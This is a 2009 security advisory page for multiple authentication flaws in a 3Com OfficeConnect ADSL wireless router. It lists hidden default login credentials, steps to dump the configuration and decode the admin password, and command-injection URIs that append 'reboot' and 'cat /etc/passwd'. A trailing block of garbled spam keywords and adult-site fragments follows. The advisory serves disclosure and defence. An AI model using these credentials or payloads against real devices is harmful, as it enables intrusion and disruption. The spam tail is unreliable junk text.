exploits , vulnerabilities , articles , 3Com OfficeConnect ADSL Wireless 11g Firewall Router Authentication Multiple Remote Vulnerabilities

Title	3Com OfficeConnect ADSL Wireless 11g Firewall Router Authentication Multiple Remote Vulnerabilities
Published	2009-10-19-12:00AM
Updated	2009-10-19-07:18PM
Class	Access Validation Error
CVE
Remote	Yes
Local	No
Credit	Andrea Fabrizi
Vulnerable	3Com OfficeConnect ADSL Wireless 11g Firewall Router 3.0
Not Vulnerable
Code	Attackers can use readily available tools to exploit these issues.These example URIs and proof of concept demonstrate the issues:1) SSH/Telnet to router using one of these hidden accounts: support:support user:5 nobody:admin 2) Type 9 3) Type 1 3) Type 3 to dump the configuration 4) Locate the sysPassword field: <sysPassword value="cXdlcnR5Cg=="/> 5) Decode the admin password: roland@hp6720s:~$ echo -ne "cXdlcnR5Cg==" \| base64 -d qwertyhttp://www.example.com/utility.cgi?testType=1&IP=aaa \|\| reboot http://www.example.com/utility.cgi?testType=1&IP=aaa \|\| cat /etc/passwd
TXT

Vulnerabilities - newest 10 RSS | More

2009-11-26 ISC BIND 9 DNSSEC Query Response Additional Section Remote Cache Poisoning Vulnerability
2009-11-26 America Online ICQ ActiveX Control Remote Code Execution Vulnerability
2009-11-26 Novell eDirectory iMonitor HTTPSTK Buffer Overflow Vulnerability
2009-11-25 Mozilla Firefox and SeaMonkey Download Filename Spoofing Vulnerability
2009-11-25 XM Easy Personal FTP Server File/Folder Remote Denial of Service Vulnerability
2009-11-25 Subscribe to Comments Prior to 2.1 Multiple Unspecified Cross Site Scripting Vulnerabilities
2009-11-25 Mozilla Firefox CVE-2009-3383 Multiple Remote Memory Corruption Vulnerabilities
2009-11-24 Subscribe to Comments WordPress Plugin Multiple Unspecified Input Validation Vulnerabilities
2009-11-24 RETIRED: Microsoft November 2009 Advance Notification Multiple Vulnerabilities
2009-11-24 Cacti Multiple HTML Injection Vulnerabilities

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Fri, 27 Nov 2009 12:09:36 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www,sex. modules/us Porno cewe Porno __ www.wommen www xxx.ru Squirrelma modules/pu www,sex. mobisweets PHPNuke Re modules/po index.php mobisweets modules/po xh13.com Porno gale modules/ic www.cp101. Indianlead modules/co Desi baba. modules/co www.mysekx modules/To girls sex Sexi girls www.mm2258 Subdreamer modules/My modules/My kin Karachi.se phpdirecto modules/My Sexmovies. modules/My www.v2jw.c modules/Fo sex. 8vide modules/Fo www.v2jw.c xh13.com modules/Al xh13.com sex. 8vide modifyform sexey vied modifyform modernbill